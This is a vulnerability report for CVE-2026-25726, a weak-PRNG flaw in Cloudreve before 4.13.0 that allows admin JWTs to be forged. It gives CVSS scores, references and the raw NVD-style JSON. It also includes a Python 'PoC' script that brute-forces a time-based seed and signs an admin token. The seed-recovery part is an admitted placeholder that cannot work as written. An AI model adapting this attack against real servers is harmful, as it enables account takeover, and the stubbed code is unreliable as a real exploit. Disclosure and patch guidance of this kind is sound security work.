Security Vulnerability Report
CVE-2026-25726 CVSS 8.1 HIGH


Published: 2026-04-03 20:16:02
Last Modified: 2026-04-13 18:31:43

Description

Cloudreve is a self-hosted file management and sharing system. Prior to version 4.13.0, the application uses the weak pseudo-random number generator math/rand, seeded with time.Now().UnixNano(), to generate critical security secrets, including the secret_key and hash_id_salt. These secrets are generated on first startup and persisted in the database. An attacker can exploit this by obtaining the administrator's account creation time (via public API endpoints) to narrow the search window for the PRNG seed, and by using a known hashid to validate a candidate seed. By brute-forcing the seed (demonstrated to take under 3 hours on a general consumer PC), an attacker can predict the secret_key. This allows them to forge valid JSON Web Tokens (JWTs) for any user, including administrators, leading to full account takeover and privilege escalation. This issue has been patched in version 4.13.0.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-338 (Use of Cryptographically Weak Pseudo-Random Number Generator)
Note: the 8.1 HIGH score above is the Secondary assessment in the raw record below; the same record also carries a Primary assessment of 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), which differs only in rating Attack Complexity as Low rather than High.

Configurations (Affected Products)

cpe:2.3:a:cloudreve:cloudreve:*:*:*:*:*:*:*:* - VULNERABLE
Cloudreve < 4.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import time
import jwt  # pip install pyjwt


# Simulate the weak PRNG logic (Go's math/rand)
# Note: Actual implementation requires replicating Go's specific RNG algorithm
def simulate_cloudreve_weak_rng(seed_ns):
    # Pseudo-random generation based on seed
    # In real exploit, this generates the specific secret_key format
    return f"secret_key_{seed_ns}"


def brute_force_seed(target_hashid, start_time_ns, window_seconds=10):
    print(f"[*] Brute forcing seed near {start_time_ns}...")
    # Iterate through nanoseconds in the time window
    for ns_offset in range(window_seconds * 1_000_000_000):
        current_seed = start_time_ns + ns_offset
        # Simulate generating secrets with this seed
        predicted_salt = simulate_cloudreve_weak_rng(current_seed)
        # Check if generated salt matches the observed hashid
        # (Simplified check for PoC demonstration)
        if hash(predicted_salt) == hash(target_hashid):
            # Offset simulating key generation
            secret_key = simulate_cloudreve_weak_rng(current_seed + 123)
            print(f"[+] Seed found: {current_seed}")
            return secret_key
    return None


# Exploit Scenario
# 1. Obtain admin creation time via API
admin_creation_time = int(time.time() * 1_000_000_000)  # Nanoseconds
known_hashid = "observed_hash_id_from_api"

# 2. Brute force to recover secret_key
secret_key = brute_force_seed(known_hashid, admin_creation_time)

if secret_key:
    # 3. Forge Admin JWT
    admin_payload = {
        "id": 1,
        "username": "admin",
        "role": "admin",
        "exp": int(time.time()) + 3600,
    }
    forged_token = jwt.encode(admin_payload, secret_key, algorithm="HS256")
    print(f"[+] Forged Admin JWT: {forged_token}")
else:
    print("[-] Failed to recover secret_key")
```

References

https://github.com/cloudreve/cloudreve/releases/tag/4.13.0 (Product, Release Notes)
https://github.com/cloudreve/cloudreve/security/advisories/GHSA-f8xp-wvcx-p6f4 (Mitigation, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-25726",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-03T20:16:02.263",
    "lastModified": "2026-04-13T18:31:43.283",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Cloudreve is a self-hosted file management and sharing system. Prior to version 4.13.0, the application uses the weak pseudo-random number generator math/rand seeded with time.Now().UnixNano() to generate critical security secrets, including the secret_key, and hash_id_salt. These secrets are generated upon first startup and persisted in the database. An attacker can exploit this by obtaining the administrator's account creation time (via public API endpoints) to narrow the search window for the PRNG seed, and use known hashid to validate the seed. By brute-forcing the seed (demonstrated to take <3 hours on general consumer PC), an attacker can predict the secret_key. This allows them to forge valid JSON Web Tokens (JWTs) for any user, including administrators, leading to full account takeover and privilege escalation. This issue has been patched in version 4.13.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 5.9
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-338"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:cloudreve:cloudreve:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "4.13.0",
                "matchCriteriaId": "0607E1D4-BDC8-40FC-9495-F19E4AE2F6BE"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/cloudreve/cloudreve/releases/tag/4.13.0",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/cloudreve/cloudreve/security/advisories/GHSA-f8xp-wvcx-p6f4",
        "source": "[email protected]",
        "tags": ["Mitigation", "Vendor Advisory"]
      }
    ]
  }
}
```